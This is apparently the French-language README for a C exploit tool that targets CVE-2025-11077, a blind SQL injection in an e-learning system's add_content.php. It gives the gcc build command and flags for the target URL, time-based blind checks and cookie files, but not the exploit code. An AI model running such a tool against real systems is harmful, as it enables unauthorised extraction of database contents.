
Exploiter une injection SQL aveugle dans (Système de Gestion de l'Apprentissage en Ligne)
Auteur : Byte Reaper
Cette vulnérabilité est une injection SQL aveugle dans le fichier add_content.php du système de gestion de l'apprentissage en ligne (CVE-2025-11077), permettant à un attaquant d'extraire des informations de la base de données en envoyant des requêtes POST conçues.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HELP :
./CVE-2025-11077 -h
- Target URL (base url)
./CVE-2025-11077 -u http://[IP]
- log file :
./CVE-2025-11077 -f [FILE]
- Check time-based blind :
./CVE-2025-11077 -u http://[IP] -b
- Cookies FILE :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT